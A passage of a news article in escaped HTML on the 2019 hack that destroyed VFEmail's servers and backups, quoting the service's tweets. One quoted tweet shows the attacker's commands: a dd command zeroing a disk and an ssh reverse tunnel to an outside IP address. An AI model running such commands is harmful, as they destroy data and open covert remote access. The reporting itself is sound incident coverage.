Game over!<\/p>\n<\/div>\n<div id=\"body\" readability=\"76.094626168224\">\n<p>A hacker wiped every server and backup of VFEmail this week in a &#8220;catastrophic&#8221; attack, according to the webmail service.<\/p>\n<p>VFEmail admins detailed the network intrusion on Monday in a grim red-letter update posted to the site&#8217;s <a target=\"_blank\" rel=\"nofollow\" href=\"https:\/\/www.vfemail.net\/\">front page<\/a>. The service&#8217;s founder Rick Romero also said it&#8217;s likely the webmail outfit is toast as a result of the ransacking:<\/p>\n<blockquote class=\"twitter-tweet tw-align-center\" data-lang=\"en\" readability=\"6.2290748898678\">\n<p lang=\"en\" dir=\"ltr\">Yes, <a href=\"https:\/\/twitter.com\/VFEmail?ref_src=twsrc%5Etfw\">@VFEmail<\/a> is effectively gone. It will likely not return.<br \/>I never thought anyone would care about my labor of love so much that they&#8217;d want to completely and thoroughly destroy it.<\/p>\n<p>\u2014 Havokmon (@Havokmon) <a href=\"https:\/\/twitter.com\/Havokmon\/status\/1095297448082317312?ref_src=twsrc%5Etfw\">February 12, 2019<\/a><\/p><\/blockquote>\n<p>While the site is once again up and running for paid users, it appears that, at least for all US customers, all their inboxes are empty, cleared out by one or more miscreants. &#8220;We have suffered catastrophic destruction at the hands of a hacker,&#8221; the site&#8217;s admins said. &#8220;This person has destroyed all data in the US, both primary and backup systems.&#8221;<\/p>\n<p>Users who log in now will be able to send and receive new mails, but all old and archived messages are gone, as are any custom filters put in place to catch malware and spam. Free accounts remain unable to send email. This is particularly bad, as the ability to scan messages for junk and software nasties was a key selling point of the service, which was set up in response to the ILoveYou virus that <a target=\"_blank\" href=\"https:\/\/www.theregister.co.uk\/2005\/05\/11\/love_bug_author\/\">spread via email in 2001<\/a>.<\/p>\n<p>This all follows a harrowing saga that played out on the webmail service&#8217;s Twitter feed over the course of the day as VFEmail provided real-time updates on the disaster:<\/p>\n<blockquote class=\"twitter-tweet tw-align-center\" data-lang=\"en\" readability=\"7.2486187845304\">\n<p lang=\"en\" dir=\"ltr\">This is not looking good. All externally facing systems, of differing OS&#8217;s and remote authentication, in multiple data centers are down.<\/p>\n<p>\u2014 VFEmail.net (@VFEmail) <a href=\"https:\/\/twitter.com\/VFEmail\/status\/1094987362931748867?ref_src=twsrc%5Etfw\">February 11, 2019<\/a><\/p><\/blockquote>\n<blockquote class=\"twitter-tweet tw-align-center\" data-lang=\"en\" readability=\"6.6136363636364\">\n<p lang=\"en\" dir=\"ltr\">Caught the perp in the middle of formatting the backup server:<br \/>dd if=\/dev\/zero of=\/dev\/da0 bs=4194304 seek=1024 count=399559<br \/>via: ssh -v -oStrictHostKeyChecking=no -oLogLevel=error -oUserKnownHostsFile=\/dev\/null aktv@94.155.49.9 -R 127.0.0.1:30081:127.0.0.1:22 -N<\/p>\n<p>\u2014 VFEmail.net (@VFEmail) <a href=\"https:\/\/twitter.com\/VFEmail\/status\/1095021927972909056?ref_src=twsrc%5Etfw\">February 11, 2019<\/a><\/p><\/blockquote>\n<blockquote class=\"twitter-tweet tw-align-center\" data-lang=\"en\" readability=\"8.3230088495575\">\n<p lang=\"en\" dir=\"ltr\">Strangely, not all VMs shared the same authentication, but all were destroyed. This was more than a multi-password via ssh exploit, and there was no ransom.
